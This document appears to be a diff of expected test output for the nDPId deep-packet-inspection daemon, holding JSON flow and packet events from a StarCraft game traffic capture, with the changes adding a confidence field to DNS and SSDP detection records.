+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955670,"flow_last_seen":1437389955670,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1437389955670,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -27,19 +27,19 @@
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1437389955696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1437389955696,"pkt":"hCYVPnXEIImEa8W6CABFAABFDD0AAIARlobAqAFkrcIoFtFAAbsAMXj5DBnPzxTN69maKsxX+B31W\/+0ERxkBS+pEu\/Lu7MhCuhfcS4mTXYS47w="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1437389955747,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389955747,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2IAAIARVpDAqAFkwKgB\/uXcADUANLhfizwBAAABAAAAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1437389955800,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"ts_msec":1437389955800,"pkt":"IImEa8W6hCYVPnXECABFAABuAABAAEARtczAqAH+wKgBZAA15dwAWs2+izyBgAABAAEAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAC+XABoNODAtMjM5LTE4Ni00MAZhdHRlbnMDbmV0AA=="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1437389956550,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2MAAIARVo\/AqAFkwKgB\/uXjADUANNVsy9IBAAABAAAAAAAAAjIyAjQwAzE5NAMxNzMHaW4tYWRkcgRhcnBhAAAMAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1437389956550,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABJX2QAAIARVo3AqAFkwKgB\/uXjADUANaawlcQBAAABAAAAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAAB"}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1437389956552,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"ts_msec":1437389956552,"pkt":"IImEa8W6hCYVPnXECABFAACPAABAAEARtavAqAH+wKgBZAA15eMAe9\/glcSBgAABAAIAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAABwAwADAABAABT2QAcEG1pbDAxczI1LWluLWYxMTAFMWUxMDADbmV0AMAMAAwAAQAAU9kAEg9taWwwMXMyNS1pbi1mMTTASg=="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7440000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"}
@@ -50,7 +50,7 @@
 00177{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","layer_type":35020}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1437389963466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"ts_msec":1437389963466,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1437389963467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGQAABAAAERxbzAqAH+7\/\/\/+pbNB2wBfPulTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KVVNOOiB1dWlkOjExMjY2NzM2LWZhNTktMTFlNC05YzlmLTg0MjYxNTNlNzVjNDo6dXBucDpyb290ZGV2aWNlDQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"}
 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1437389963467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"ts_msec":1437389963467,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1437389964511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1437389964511,"pkt":"hCYVPnXEIImEa8W6CABFAAA8SKZAAIAGzljAqAFkUO\/QwQ1jBF+OUzh85cVUn1AY+eiiKgAAgb8pIAfuTigNRzF0YIhRn73AbVc="}
@@ -58,24 +58,24 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"}
